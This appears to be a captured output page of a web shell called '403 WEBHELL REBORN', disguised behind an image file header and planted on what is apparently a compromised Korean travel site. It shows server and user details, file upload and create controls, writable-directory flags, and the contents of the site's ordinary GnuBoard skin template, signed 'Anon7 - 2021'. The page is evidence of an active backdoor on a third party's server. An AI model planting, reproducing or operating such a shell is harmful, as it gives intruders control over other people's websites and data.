ÿØÿà JFIF  ` ` ÿþš 403 WEBHELL REBORN
403 WEBHELL REBORN
Server : Apache
System : Linux ruga7-004.fmcity.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : tkt_travelbus ( 1137)
PHP Version : 7.0.0p1
Disable Function : mysql_pconnect
Directory :  /tkt_travelbus/www/skin/latest/main_blog/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Buat Folder Baru:
Buat File Baru:

Current File : /tkt_travelbus/www/skin/latest/main_blog/latest.skin.php
<?
if (!defined("_GNUBOARD_")) exit; // 개별 페이지 접근 불가

$rows = count($list);
$style_name = "mw-group-$bo_table-$rows-$subject_len";

?>


<style type="text/css">
#<?=$style_name?> { clear:both; margin:0; border:0px solid #e1e1e1; }
#<?=$style_name?> .item { clear:both; display:none; }
#<?=$style_name?> .file-img-b { width:100px; height:68px; border:0px solid #e1e1e1; border-left:0; }
#<?=$style_name?> .subject { clear:both; height:20px; font-weight:bold; font-size:12px; }
#<?=$style_name?> .subject a { text-decoration:none; }
#<?=$style_name?> .prev { float:left; margin:0 0 0 -4px; cursor:pointer; }
#<?=$style_name?> .next	{ float:left; margin:0 0px 0 0; cursor:pointer; }
#<?=$style_name?> .link	{ float:left; margin:0 0 0 5px; text-align:center; }
</style>

<div id="<?=$style_name?>">

<? for ($i=0; $i<$rows; $i++) { ?>

<table width="220" border="0" cellspacing="0" cellpadding="0" style="margin-left:10px;">
<tr>
<?
$img = "$g4[path]/data/file/$bo_table/thumb/{$list[$i][wr_id]}";
if (!@file_exists($img)) $img = "$g4[path]/data/file/$bo_table/thumbnail/{$list[$i][wr_id]}";
if (!@file_exists($img)) $img = "{$list[$i][file][0][path]}/{$list[$i][file][0][file]}";
if (!@file_exists($img)) $img = "";
if (!$list[$i][wr_id]) $img = "";
if (@is_dir($img)) $img = "";

// 이미지 경로가 없을 경우처리 [2008-03-28]
if( trim(strrchr($img, "/")) == '/' ) $img = '';				
$img = $img ? $img : $latest_skin_path.'/img/noimg.gif';
?>

<td valign=top>


<? if ($img != './skin/latest/mafter/img/noimg.gif') { ?>


<table style="border-collapse:collapse;" cellspacing="0" width="220" align="center">
    <tr>
		 <td height=30><a href="<?=$list[$i][wr_2]?>" target="_blank"><span style="color:#4e69a2;font-size:13px; font-family:Malgun gothic,Nanum gothic,dotum;line-height:140%;"><b><?=$list[$i][subject]?></b></span></a></td>
          </tr>
	<tr>
        <td style="padding-top:10px;padding-bottom:10px;">
            <a href="<?=$list[$i][wr_2]?>" target="_blank"><img src="<?=$img?>" width="220"></a>
        </td>
	</tr>
	
            <tr>
				<td><a href="<?=$list[$i][wr_2]?>" target="_blank"><span style="color:#666666;font-size:12px; Malgun gothic,Nanum gothic,dotum;line-height:130%;">
<?=cut_str(strip_tags($list[$i][wr_content]),100,"...")?></span></a></td>
            </tr>
            <tr>
				<td><span style="color:#666666;font-size:11px; font-family:tahoma;"><?=$list[$i][wr_1]?></span></td>
            </tr>
			<tr><td height=10></td></tr> 
			<tr><td height=1 bgcolor=#dddddd></td></tr> 
			<tr><td height=10></td></tr> 
            </table>
        </td>
    </tr>
</table>


<? } else { ?>

<table style="border-collapse:collapse;" cellspacing="0" width="100%">
    <tr>
        <td width="100%" height="98">
            <table>
            <tr>
				<td height=25><a href="<?=$list[$i][wr_2]?>" target="_blank"><span style="color:#000000;font-size:13px; font-family:Malgun gothic,Nanum gothic,dotum;"><?=$list[$i][subject]?></span></a></td>
            </tr>
            <tr>
				<td><a href="<?=$list[$i][wr_2]?>" target="_blank"><span style="color:#666666;font-size:12px; font-family:tahoma; letter-spacing:0px; line-height:14px;">
<?=cut_str(strip_tags($list[$i][wr_content]),220,"...")?></span></a></td>
            </tr>
            <tr>
				<td><span style='font-size:11px; color:#777777;'><img src='../img/icon_clock2.gif' border='0'>&nbsp;<?=substr($list[$i][wr_datetime],0,10)?></span>&nbsp;&nbsp;<span style="color:#cccccc;font-size:10px; font-family:tahoma;">|</span>&nbsp;&nbsp;<span style="color:#666666;font-size:11px; font-family:dotum;"><?=$list[$i][wr_name]?></span></td>
            </tr>
            </table>
        </td>
    </tr>
</table>

<? } ?>

</td> 
</tr>
<tr>
<td height="1" bgcolor="#dddddd"></td>
</tr>
</table>
<? } ?>
</div>

Anon7 - 2021